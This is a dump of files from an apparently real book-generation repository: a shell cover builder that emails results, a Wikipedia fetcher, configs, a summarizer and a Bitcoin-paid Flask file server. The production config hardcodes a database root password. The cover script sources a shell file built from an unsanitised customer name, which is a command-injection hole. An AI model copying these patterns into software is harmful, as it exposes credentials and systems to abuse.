lay the spine logotype on the full canvas\n\n\t\tstep1=$(( $safepageheight))\n\t\techo \"step1 is \" $step1\n\t\tstep2=$(( $step1 - 900 ))\n\t\techo \"step2 is \"$step2\n\t\tspinelogotypebegin=$(( $step2 ))\n\t\techo \"calculated spinelogotype begin as \" $spinelogotypebegin\n\n\t\tspinelogotypeleftmargin=$(( $spineleftmargin + 2 ))\n\n\t\techo \"about to lay down the missing logobar at \" $spineleftmargin \",\" $spinelogotypebegin\n\n\t\tconvert images/$uuid/print/fullcanvas3.png \\\n\t\timages/$uuid/print/logobar.png -geometry +$spineleftmargin+$spinelogotypebegin -composite \\\n\t\timages/$uuid/print/fullcanvas4.png\n\n\t\techo \"finished laying the spine on the canvas\"\n\n fi\n\n\t\techo \"determining what to lay on back cover\"\n\n\techo \"covertype is \"$covertype\n\t\tcase \"$covertype\" in\n\t\timagefrontcenter)\n\n\t\t\t\n\n\t\t\tpdf2txt \"$pdfpath\" > images/$uuid/print/wordcloud.txt\n\n\t\t\t$JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w $wordcloudwidth -h $wordcloudheight < images/$uuid/print/wordcloud.txt > images/$uuid/print/\"printcloud.png\" 2> /dev/null\n\n\t\t\t# building WordCloud \"PK Peek\" \n\n\t\t\tpeekthroughwidth=$(( wordcloudwidth / 3 + 25))\n\n\t\t\tconvert -size \"$peekthroughwidth\"x100 -density 300 -border 1 -bordercolor \"white\" -units pixelsperinch -background 
$covercolor -fill \"$coverfontcolor\" \\\n\t\t\t-font \"$coverfont\" -gravity center -pointsize 11 caption:\"Peekthrough by PageKicker\" images/$uuid/print/peekthrough.png \n\t\t\tconvert images/$uuid/print/\"printcloud.png\" images/$uuid/print/peekthrough.png -composite images/$uuid/print/\"peekprintcloud.png\"\n\t\t\n\t\t\t# overlay the Word Cloud on the back cover\n\n\t\t\twordcloudylocation=$(($ISBNylocation - $wordcloudheight))\n\t\t\techo \"calculated wordcloudylocation as\" $wordcloudylocation\n\n\t\t\tcomposite -geometry +$ISBNxlocation+$wordcloudylocation images/$uuid/print/\"peekprintcloud.png\" images/$uuid/print/fullcanvas4.png images/$uuid/print/fullcanvas4.png\n\n\t\t\techo \"built word cloud and put it on back cover\"\n\t\t\t;;\n\t\twordcloud)\n\t\t\n\t\t\t#since wordcloud is on front caption is on back\n\n\t\t\tbackcoverlocation=$(($ISBNylocation -300 ))\n\t\t\techo \"calculated backcoverylocaion as\" $backcoverylocation\n\t\t\tconvert -size 1200x1200 -density 300 -border 1 -bordercolor \"$covercolor\" -units pixelsperinch -background $covercolor -fill $coverfontcolor -font $coverfont -gravity center -pointsize 11 caption:@images/$uuid/print/backcover.txt images/$uuid/print/backcovertext.png\n\n\t\t\tcomposite -geometry +$ISBNxlocation+$backcoverylocation images/$uuid/print/\"backcovertext.png\" images/$uuid/print/fullcanvas4.png images/$uuid/print/fullcanvas5.png\n\n\t\t\techo \"built caption text and put it on back cover\"\n\t\t\t;;\n\n\t\t*)\n\t\t\techo \"did not recognize cover type\"\n\t\t\t;;\n\t\tesac\n\n\t\n\t\t# lay the ISBN box at the bottom left corner of the full canvas\n\n\t\tconvert images/$uuid/print/fullcanvas4.png images/$uuid/print/fullcanvas4.tif\n\n\t\tsudo convert images/$uuid/print/fullcanvas4.tif images/$uuid/print/$userprovidedprintISBN\"box.png\" -geometry +$ISBNxlocation+$ISBNylocation -composite -colorspace \"CMYK\" images/$uuid/print/fullcanvas5.tif\n\n\t\t\n\t\t\n\t\techo \"laid the ISBN box down\"\n\n\t\tcp images/$uuid/print/fullcanvas5.tif images/$uuid/print/finalcanvas.tif\n\n\n\t# lay the back text on the canvas\n\t\n # save the cover and prepare it for production\n\n\t# save as single large file (png)\n\n\t# convert RGB to CMYK\n\n\tsudo convert images/$uuid/print/finalcanvas.tif -colorspace CMYK images/$uuid/print/\"$userprovidedprintISBN\".pdf\n\tsudo convert images/$uuid/print/finalcanvas.tif -colorspace CMYK images/$uuid/print/\"$userprovidedprintISBN\"final.eps\n\n\n# save the cover and prepare it for production\n\n\t# save as single large file (png)\n\n\t# convert RGB to CMYK\n\n\n\techo \"built print cover as file images/$uuid/print/$sku.cmyk.pdf\" | tee --append $sfb_log\n\n# building interior now that front cover has been built (some extra logic here ... 
need to tighten)\n\n#xvfb-run --auto-servernum ebook-convert tmp/$uuid/cumulative.html $mediatargetpath$uuid/$sku\".pdf\" --cover \"images/\"$uuid\"/print/\"$sku\"printfrontcover.png\" --margin-left \"54\" --margin-right \"54\" --margin-top \"54\" --margin-bottom \"54\" --pdf-default-font-size \"11\" --pdf-page-numbers --insert-metadata --pdf-serif-family \"AvantGarde\" --title \"$covertitle\"\n\nif [ \"$pdfx1a\" = \"None\" ] ; then \n\necho \"not saving interior as PDFx1a\"\n\nelif [ \"$pdfx1a\" = \"PDFX1a color\" ] ; then\n\necho \"saving interior as PDFX1a color\"\n\n./lib/pstill_dist/pstill -M defaultall -m XimgAsCMYK -m Xspot -m Xoverprint -d 500 -m XPDFX=INTENTNAME -m XPDFXVERSION=1A -m XICCPROFILE=USWebCoatedSWOP.icc -o images/$uuid/print/interior.pdf $pdfpath\n\nelif [ \"$pdfx1a\" = \"PDFX1a black and white\" ] ; then \n\necho \"saving interior as PDFx1a black and white\"\n\n./lib/pstill_dist/pstill -B -M defaultall -m XimgAsCMYK -m Xspot -m Xoverprint -d 500 -m XPDFX=INTENTNAME -m XPDFXVERSION=1A -m XICCPROFILE=USWebCoatedSWOP.icc -o images/$uuid/print/interior.pdf $pdfpath\n\nelse\n\necho \"I'm confused about requested PDFx1a action\"\n\nfi\n\n# now mailing results\n\nif [ \"$pdfx1a\" = \"None\" ] ; then \n\necho \"sending cover only\"\n\nsendemail -t \"$customer_email\" \\\n\t-u \"Cover Builder Results\" \\\n\t-m \"Cover attached\" \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp \"$GMAIL_PASSWORD\" \\\n -a images/$uuid/print/$userprovidedprintISBN.pdf \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \n\nelif [ \"$pdfx1a\" = \"PDFX1a color\" ] ; then\n\necho \"sending cover and interior\"\n\nsendemail -t \"$customer_email\" \\\n\t-u \"Cover Builder Results\" \\\n\t-m \"Cover attached\" \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp \"$GMAIL_PASSWORD\" \\\n -a images/$uuid/print/$userprovidedprintISBN.pdf \\\n\t-a images/$uuid/print/interior.pdf \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \n\nelif [ \"$pdfx1a\" = \"PDFX1a black and white\" ] ; then \n\necho \"saving interior as PDFx1a black and white\"\n\nsendemail -t \"$customer_email\" \\\n\t-u \"Cover Builder Results\" \\\n\t-m \"Cover attached\" \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp \"$GMAIL_PASSWORD\" \\\n -a images/$uuid/print/$userprovidedprintISBN.pdf \\\n -a images/$uuid/print/interior.pdf \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \nelse\n\n\techo \"didn't mail anything\"\nfi\n\necho -n \"t update \" > images/$uuid/tcommand\necho -n \\\" >> images/$uuid/tcommand\necho -n Automagically built a one-click cover for $customername >> images/$uuid/tcommand\necho -n \\\" >> images/$uuid/tcommand\n. 
images/$uuid/tcommand\n\nfb_announcement=\"yes\"\n\nif [ \"$fb_announcement\" = \"yes\" ] ; then\n\n    fbcmd PPOST 472605809446163 \"Automagically built a one-click cover for $customername\"\n\nelse\n    echo \"no fb notification\"\nfi\n\n\n" }, { "alpha_fraction": 0.6458598971366882, "alphanum_fraction": 0.6535031795501709, "avg_line_length": 26.068965911865234, "blob_id": "ef545bbfb2d2e7756b371a84c6bba85bc2153592", "content_id": "32d68c602321348faac5dcf0340f77fb775111d8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1570, "license_type": "permissive", "max_line_length": 113, "num_lines": 58, "path": "/scripts/bin/wikifetcher.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nwikipedia text fetcher\nFred Zimmerman\nwfzimmerman#gmail.com\n\nenhanced to allow pointing at any MediaWiki endpoint URL\n\n\n\"\"\"\n\nimport argparse, wikipedia\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\n#parser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--mediawiki_api_url\", help = \"MediaWiki API endpoint URL\", default = 'http://en.wikipedia.org/w/api.php')\nargs = parser.parse_args()\n\ninput_file = args.infile\noutput_file = args.outfile\nlang = args.lang\nsummary = args.summary\nmediawiki_api_url = args.mediawiki_api_url\n\n# the endpoint URL is parsed and echoed but is not yet passed to the wikipedia library\ntest = 'mw url is ' + mediawiki_api_url\nprint(test)\n\n# request_type = args.request_type\nwikipedia.set_lang(lang)\n\nfile = open(input_file, 'r')\nfile2 = open(output_file, 'wb')\nfor line in file:\n    #print(line),\n    try:\n        a = wikipedia.page(line)\n        if args.summary:\n            a = a.summary\n        else:\n            a = a.content\n    except (wikipedia.exceptions.DisambiguationError, wikipedia.exceptions.WikipediaException):\n        continue\n\n    file2.write(b'\\n')\n    # print(a.encode('utf-8'))\n    file2.write(b'\\n')\n    file2.write(b'# ' )\n    file2.write(line.encode('utf-8'))\n    file2.write(b'\\n')\n    file2.write(a.encode('utf-8'))\nfile2.close()\n" }, { "alpha_fraction": 0.7633168697357178, "alphanum_fraction": 0.7682592272758484, "avg_line_length": 29.316667556762695, "blob_id": "03db15f86385a22180c681cc1d144ef93cab956", "content_id": "236122b4449f0ab9c39bbcdeddd556fa0bda7c12", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1821, "license_type": "permissive", "max_line_length": 82, "num_lines": 60, "path": "/conf/sfb-production.conf.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# configuration 
file\n\nSFB_HOME=\"/opt/bitnami/apache2/htdocs/sfb-production/\"\nSFB_MAGENTO_HOME=\"/opt/bitnami/apps/magento/htdocs/\"\nLOCAL_DATA=$SFB_HOME\"local-data/\"\nSFB_PHP_BIN=\"/opt/bitnami/php/bin/php\"\nJAVA_BIN=\"/opt/bitnami/java/bin/java\"\nSFB_VERSION=\"-production.sh\"\nUSER_HOME=\"/home/bitnami/\"\nLOCAL_USER=\"bitnami\"\nWEBFORMSXML_HOME=\"/opt/bitnami/apps/magento/htdocs/sfb-production/magento-output/\"\nWEB_HOST=\"http://www.PageKicker.com/\"\nWEB_ROOT=$SFB_HOME\"pk-html/\"\nWEB_SCRIPTPATH=\"scripts/\"\nAPACHE_ROOT=\"$SFB_HOME\"\nLOCAL_MYSQL_PATH=\"/opt/bitnami/mysql/bin/mysql\"\nLOCAL_MYSQL_USER=\"root\"\nLOCAL_MYSQL_PASSWORD=\"Balssa41\"\n\nmetadatatargetpath=$SFB_MAGENTO_HOME\"var/import/\"\nmediatargetpath=$SFB_MAGENTO_HOME\"media/import/\"\nmediaarchivetxt=$SFB_MAGENTO_HOME\"media/archive/txt/\"\nscriptpath=$SFB_HOME\"scripts/\"\ntextpath=$SFB_HOME\"txt/\"\nimagedir=\"images/\"\nlogdir=$LOCAL_DATA\"logs/\"\nsfb_log=$logdir\"sfb_log.txt\"\nsfb_log_archive=$LOCAL_DATA\"archives/sfb_log_archive.txt\"\nxform_log=$logdir\"xform_log.txt\"\ntodaysarchivefolder=$(date +\"%Y%m%d\")\ntiphys_log=$SFB_HOME\"local-data/logs/tiphys_log.txt\"\nlsi_log=$LOCAL_DATA\"logs/lsi_log.txt\"\nwikilocale=\"en\"\nspecialstoreid=\"0\"\ngooglecollectioncode=\"HNXTBK0\" # for dedicated google book upload\ngoogle_nonONIX_import=\"no\"\n\n\n#imagemagick setup\n\ncover_image_extension=\".png\"\ntxtformatname=\".txt\"\ntxtwildcard=\"*.txt\"\nepub=\".epub\"\nsubtitle=\"\"\nepubcheckjarpath=$scriptpath\"lib/epubcheck-3.0/epubcheck-3.0.jar\"\n# cover builder setup\n\nprintconfigfile=\"yes\"\n\n#xmlstarlet setup\n\nxmlstarletwebformstart=\"xmlstarlet sel -t -v\"\nxpathwebformid='\"/item/webform_id\"'\nbooktypewebformid='\"/item/booktype\"'\nsingleseedwebformid='\"/item/singleseed\"'\ncustomeridwebformid='\"/item/customerid\"'\n\n\n" }, { "alpha_fraction": 0.6634219288825989, "alphanum_fraction": 0.6720329523086548, "avg_line_length": 46.67856979370117, "blob_id": "bf91d506376b14bef109c377702c1d9bbb7771fb", "content_id": "8cc82c60b5b7dfa166c7ee7ca0a9ef2c2df15537", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2671, "license_type": "permissive", "max_line_length": 209, "num_lines": 56, "path": "/scripts/includes/fork-chapter-assembler.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# process each chapter\n#TEXTDOMAIN=chapter-assembler\nebook-convert tmp/$uuid/$count.html tmp/$uuid/$count.txt --pretty-print 1> /dev/null\necho $\"Chapter \"$count $safetitle >> tmp/$uuid/tmp.cumulative.txt\ncat tmp/$uuid/$count.txt >> tmp/$uuid/tmp.cumulative.txt\n\n echo \"now building word cloud page\" | tee --append $sfb_log\n\n $JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w 1800 -h 2700 < tmp/$uuid/$count\".txt\" > tmp/$uuid/$count\".cloudbase.png\" 2> /dev/null\n\necho \"newcovercolor is\" $newcovercolor\necho \"coverfontcolor is\" $coverfontcolor\necho \"newcoverfont is \" $newcoverfont\n\nconvert -size 1800x100 -density 300 -border 1 -bordercolor \"white\" -units pixelsperinch -background $newcovercolor -fill \"$coverfontcolor\" \\\n-font \"$newcoverfont\" -gravity center -pointsize 11 caption:\"Visual Summary of $title\" tmp/$uuid/cloudcaption$count.png \n\nconvert tmp/$uuid/cloudcaption$count.png tmp/$uuid/$count\".cloudbase.png\" 
-append tmp/$uuid/$count.png\n\necho \"built word cloud for chapter \" $count \"to tmp/\"$uuid\"/\"$count\".png\" | tee --append $sfb_log\n\ncat includes/wordcloudpageheader.html > tmp/$uuid/wordcloud.$count.html\n\necho $angbr\"img src=\"$dq$count\".png$dq\" alt=$dq\"Visual Summary\"$dq$endbr >> tmp/$uuid/wordcloud.$count.html\n\n\necho \"now building dingbat page\" | tee --append $sfb_log\n\n\necho $\"A favorite quote from\" \"$editedby\" >> tmp/$uuid/dingbat.$count.html\n\n/usr/games/fortune $fortunedb -s >> tmp/$uuid/dingbat.$count.html\n\necho \"</quote><hr>\" >> tmp/$uuid/dingbat.$count.html\n\necho \"<center>\" >> tmp/$uuid/dingbat.$count.html\n\necho $angbr\"img src=\"$dq$dingbat$dq$slash$endbr >> tmp/$uuid/dingbat.$count.html\n\necho \"</center>\" >> tmp/$uuid/dingbat.$count.html\n\ncat includes/wordcloudpagefooter.html >> tmp/$uuid/dingbat.$count.html\n\t\t\necho \"now assembling pages and chapters into cumulative html\" | tee --append $sfb_log\n\n\necho -n \"<li>\"$description\"</li>\" >> tmp/$uuid/stored-descriptions.html\necho -n \"$description\" | sed -e 's/\"/_/g' -e 's/#/ /g' -e 's/\\&/ /g' -e 's/'\\''/_/g' -e 's/, /_/g' -e 's/,/_/g' -e 's/\\//_/g' -e 's// /g' -e 's/\\\\/ /g' -e 's/|/_/g' >> tmp/$uuid/lsi-stored-descriptions.txt\n\ncat tmp/$uuid/wordcloud.$count.html >> tmp/$uuid/tmp.cumulative.html\n\ncat tmp/$uuid/$count\".html\" >> tmp/$uuid/tmp.cumulative.html\n# cat tmp/$uuid/dingbat.$count.html >> tmp/$uuid/tmp.cumulative.html\n\necho -n \"<li>\"$description\"</li>\" >> tmp/$uuid/stored-descriptions.html\necho -n \"$description\" | sed -e 's/\"/_/g' -e 's/#/ /g' -e 's/\\&/ /g' -e 's/'\\''/_/g' -e 's/, /_/g' -e 's/,/_/g' -e 's/\\//_/g' -e 's// /g' -e 's/\\\\/ /g' -e 's/|/_/g' >> tmp/$uuid/lsi-stored-descriptions.txt\n\n" }, { "alpha_fraction": 0.6681564450263977, "alphanum_fraction": 0.6860335469245911, "avg_line_length": 21.375, "blob_id": "d884f4859e4df46f920d48b2fbef0b45b108307b", "content_id": "bf410fc166771a631956d8fda1d144ef93cab956", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 895, "license_type": "permissive", "max_line_length": 76, "num_lines": 40, "path": "/conf/fortunes/README", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Contents\n--------\n\n\t1. Installation and usage\n\t2. Availability\n\t3. Acknowledgments\n\t4. Contacting the author\n\n1. Installation and usage\n-------------------------\n\nTo install these fortunes, copy the .dat file to your fortunes directory.\n(possibly /usr/games/lib/fortunes)\n\nTo use it, simply type:\n\nfortune starwars\n\n2. Availability\n---------------\n\nYou can always get the latest version of this fortune file from my website:\nhttp://andi.sunsite.dk/\n\n3. Acknowledgments\n------------------\n\nThis fortunefile was based off a list found at \nhttp://stud1.tuwien.ac.at/~e9327324/Quotes.html which was compiled\nby Roman Kurmanowytsch <[email protected]>\n\nThe entire text is copyrighted by the rightful owners.\n\n4. Contacting the author\n------------------------\n\nWhere author means author of the fortune file as is, and not the text writer\nof Star Wars, of course. 
Suggestions, questions, comments, patches:\n\nAndreas Gohr <[email protected]>\n" }, { "alpha_fraction": 0.6982162594795227, "alphanum_fraction": 0.7047688364982605, "avg_line_length": 35.62666702270508, "blob_id": "bdf8b06fb05bc00bab743196a6a1da69cbec79d1", "content_id": "37061c43cd5090ad59f8f243406878f2bc57e991", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2747, "license_type": "permissive", "max_line_length": 75, "num_lines": 75, "path": "/scripts_python_3/bin/summarize.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# Simple Summarizer \n# Copyright (C) 2010-2012 Tristan Havelick \n# Author: Tristan Havelick <[email protected]>\n# URL: <https://github.com/thavelick/summarize/>\n# For license information, see LICENSE.TXT\n\n\"\"\"\nA summarizer based on the algorithm found in Classifier4J by Nick Lothian. \nIn order to summarize a document this algorithm first determines the \nfrequencies of the words in the document. It then splits the document\ninto a series of sentences. Then it creates a summary by including the\nfirst sentence that includes each of the most frequent words. Finally the\nsummary's sentences are reordered to match their order in the original \ndocument.\n\"\"\"\n\n##//////////////////////////////////////////////////////\n## Simple Summarizer\n##//////////////////////////////////////////////////////\n\nfrom nltk.probability import FreqDist \nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nimport nltk.data\n\nclass SimpleSummarizer:\n\n\tdef reorder_sentences( self, output_sentences, input ):\n\t\t# sort the sentences by their position in the original input\n\t\toutput_sentences.sort( key = lambda s: input.find(s) )\n\t\treturn output_sentences\n\t\n\tdef summarize(self, input, num_sentences ):\n\t\t# TODO: allow the caller to specify the tokenizer they want\n\t\t# TODO: allow the user to specify the sentence tokenizer they want\n\t\t\n\t\ttokenizer = RegexpTokenizer('\\w+')\n\t\t\n\t\t# get the frequency of each word in the input\n\t\tbase_words = [word.lower() \n\t\t\tfor word in tokenizer.tokenize(input)]\n\t\twords = [word for word in base_words if word not in stopwords.words()]\n\t\tword_frequencies = FreqDist(words)\n\t\t\n\t\t# now create a set of the most frequent words\n\t\tmost_frequent_words = [pair[0] for pair in \n\t\t\tword_frequencies.most_common(100)]\n\t\t\n\t\t# break the input up into sentences. 
working_sentences is used \n\t\t# for the analysis, but actual_sentences is used in the results\n\t\t# so capitalization will be correct.\n\t\t\n\t\tsent_detector = nltk.data.load('tokenizers/punkt/english.pickle')\n\t\tactual_sentences = sent_detector.tokenize(input)\n\t\tworking_sentences = [sentence.lower() \n\t\t\tfor sentence in actual_sentences]\n\n\t\t# iterate over the most frequent words, and add the first sentence\n\t\t# that inclues each word to the result.\n\t\toutput_sentences = []\n\n\t\tfor word in most_frequent_words:\n\t\t\tfor i in range(0, len(working_sentences)):\n\t\t\t\tif (word in working_sentences[i] \n\t\t\t\t and actual_sentences[i] not in output_sentences):\n\t\t\t\t\toutput_sentences.append(actual_sentences[i])\n\t\t\t\t\tbreak\n\t\t\t\tif len(output_sentences) >= num_sentences: break\n\t\t\tif len(output_sentences) >= num_sentences: break\n\t\t\t\n\t\t# sort the output sentences back to their original order\n\t\toutput_sentences = self.reorder_sentences(output_sentences, input)\n\n\t\t# concatinate the sentences into a single string\n\t\treturn \" \".join(output_sentences)\n" }, { "alpha_fraction": 0.678145706653595, "alphanum_fraction": 0.6933774948120117, "avg_line_length": 23.354839324951172, "blob_id": "165d9c184c89544ff2a2cc62dbd65e08c33ee924", "content_id": "394fd020f2efc1a81e6e3752f4731e59bcb0edcf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1510, "license_type": "permissive", "max_line_length": 71, "num_lines": 62, "path": "/scripts_python_3/bitcoin/fileserver/server.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport os\nimport sys\nimport json\nimport random\nimport os.path\n\nfrom flask import Flask\nfrom flask import request\nfrom flask import send_from_directory\n\nfrom two1.wallet import Wallet\nfrom two1.bitserv.flask import Payment\n\napp = Flask(__name__)\nwallet = Wallet()\npayment = Payment(app, wallet)\n\n# Print error and die if a files directory isn't provided\nif len(sys.argv) != 2:\n print((\"Usage: {} <files_directory>\".format(sys.argv[0])))\n sys.exit(1)\n\ndir_path = os.path.abspath(sys.argv[1])\n\n# get a list of the files in the directory\nfile_list = os.listdir(dir_path)\n\n# simple content model: dictionary of files w/ prices\nfiles = {}\nfor file_id in range(len(file_list)):\n files[file_id+1] = file_list[file_id], random.randrange(3000, 5000)\n\n\n# endpoint to look up files to buy\[email protected]('/files')\ndef file_lookup():\n return json.dumps(files)\n\n\n# return the price of the selected file\ndef get_price_from_request(request):\n id = int(request.args.get('selection'))\n return files[id][1]\n\n\n# machine-payable endpoint that returns selected file if payment made\[email protected]('/buy')\[email protected](get_price_from_request)\ndef buy_file():\n\n # extract selection from client request\n sel = int(request.args.get('selection'))\n\n # check if selection is valid\n if(sel < 1 or sel > len(file_list)):\n return 'Invalid selection.'\n else:\n return send_from_directory(dir_path, file_list[int(sel)-1])\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n" }, { "alpha_fraction": 0.7093541026115417, "alphanum_fraction": 0.7104676961898804, "avg_line_length": 24.657142639160156, "blob_id": "42ac5d85d4fdbf88fc12cde2e8bf9be942612fa2", "content_id": "3e3d85a8fe6ebee7b17fbf03edcb5997eaff89cf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, 
"language": "Shell", "length_bytes": 898, "license_type": "permissive", "max_line_length": 107, "num_lines": 35, "path": "/scripts/check_for_duplicate_seeds-as-pipe.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. ../conf/config.txt\n\ncd $scriptpath\n\n#clean up previous\n\nrm $scriptpath\"seeds/trends/google_screened.seed\"\n\nrm $scriptpath\"seeds/trends/google_nodupes.seed\"\n\nwhile read i\ndo\nif grep -q \"$i\" $LOCAL_DATA\"seeds/history/seed-history.csv\"\nthen \n\t\n\techo $i \"has already been used to build a book\" | tee --append $LOCAL_DATA\"logs/seed.log\"\n\techo \"\" >> $scriptpath\"seeds/trends/google_nodupes.seed\"\n # figure out how to send an error report to the user here\n\nelse\n\techo $i >> $LOCAL_DATA\"seeds/trends/google_nodupes.seed\"\n\techo \"seed\" $i \"was not a duplicate\" | tee --append $LOCAL_DATA\"logs/seed.log\"\nfi\n\t\n\tdone < seeds/trends/google\n\n# only works for google right now!\n\nsed '/^$/d' $scriptpath\"seeds/trends/google_nodupes.seed\" > $scriptpath\"seeds/trends/google_screened.seed\"\t\n\necho \"finished writing google_screened.seeds file at \" `date +'%m/%d/%y%n %H:%M:%S'` >> logs/seed.log\n\nexit 0\n" }, { "alpha_fraction": 0.664277195930481, "alphanum_fraction": 0.664277195930481, "avg_line_length": 51.3125, "blob_id": "c51f2bf07ee93ecbb3adc4b0b7cb187630013f99", "content_id": "85a12f4c79fb9726f5c931cde87b65a48da9dc8d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 837, "license_type": "permissive", "max_line_length": 101, "num_lines": 16, "path": "/scripts/includes/settings.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \" \" > \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\necho \"# Settings\" >> \"$TMPDIR$uuid/settings.md\"\necho \"Key parameters are listed here.\" >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\necho \"**Booktype:** \" >> \"$TMPDIR$uuid/settings.md\"\necho \"$booktype\" >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\necho \"**Search seeds after screening and deduplication:**\" >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\ncat $TMPDIR$uuid/seeds/sorted.seedfile | sed G >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\necho \"**Expand seeds via page title strategy?**\" $expand_seeds_to_pages >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\necho \" \" >> \"$TMPDIR$uuid/settings.md\"\n" }, { "alpha_fraction": 0.8012295365333557, "alphanum_fraction": 0.8012295365333557, "avg_line_length": 161.6666717529297, "blob_id": "01bef57165efdf856dbffcacdefb93b6fe690c5a", "content_id": "ea1e947ab75ad82d04240ec3ef8ed912cd2be3db", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 488, "license_type": "permissive", "max_line_length": 371, "num_lines": 3, "path": "/conf/jobprofiles/authorbios/Vita_S.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Raised on a country estate in the Lake District, Vita moved to London after her first marriage. She has a long association with gardens and gardening and brings these skills to her curatorial work at Pagekicker. Ms. S. 
has agreed to guide the compilation of the PageKicker Famous Gardens series and was responsible for last year's table decorations at the holiday party.\n\nWhen Vita is not in the garden she likes flower arranging, \"but not Ikebana as it is too structured for my taste.\"\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 9, "blob_id": "a47b65668c3b3710d16d1505fc788a0749bed05d", "content_id": "5fad95f4fd7abe94f04375f15150264351ff8e61", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 30, "license_type": "permissive", "max_line_length": 16, "num_lines": 3, "path": "/scripts/managelibrary.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# manage library\n" }, { "alpha_fraction": 0.7626489996910095, "alphanum_fraction": 0.7793377637863159, "avg_line_length": 61.91666793823242, "blob_id": "762904ebc49364498f78bc2abedec3ed81b03b1e", "content_id": "44d54b91d7c3901171c91ee62ce734e4d00f035a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3775, "license_type": "permissive", "max_line_length": 527, "num_lines": 60, "path": "/docs/doc/how_to_customize.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# Customizing PageKicker\n\nPageKicker accomplishes customization through a hierarchy of default values and configuration files. All variables and configuration values are set to \"sensible\" defaults that can, if desired, be overridden. The priority order is as follows.\n\nThe logic in builder.sh beginning\n\n`if shopt -q login_shell\n...\nfi`\n\ndetects whether the user is a login shell or nonlogin shell and whether there is a valid configuration file associated with the current process user; if not it creates one from the default. You may need to create a nonlogin shell config file if you are running the script from a daemon or cron job.\n\n~/.pagekicker/config.txt sets global environment values and the top section of the file MUST BE CUSTOMIZED to provide accurate paths for your particular environment.\n\nscripts/includes/set-variables.sh then reads in default values for all pagekicker-specific system variables and sets up some logging information. Log paths are specified in config.txt.\n\nThe values for config.txt and set-variables can then be overridden by command line parameters provided in the subsequent while : loop which is constructed without getopts (see https://stackoverflow.com/questions/192249/how-do-i-parse-command-line-arguments-in-bash).\n\nSome command line parameters can specify values directly, such as --byline \"Fred Zimmerman\", --booktitle \"Test Book\", --coverfront \"Arial\", --imprintname \"Nimble Books\", and so on.\n\nSome command line parameters specify text or binary files. For example, --seedfile provides a list of \"seeds\" (key phrases) that the system will loop over to construct a book.\n\nAlternately, some command line parameters can specify configuration files that set a variety of additional variables all at once. The --jobprofile parameter specifies 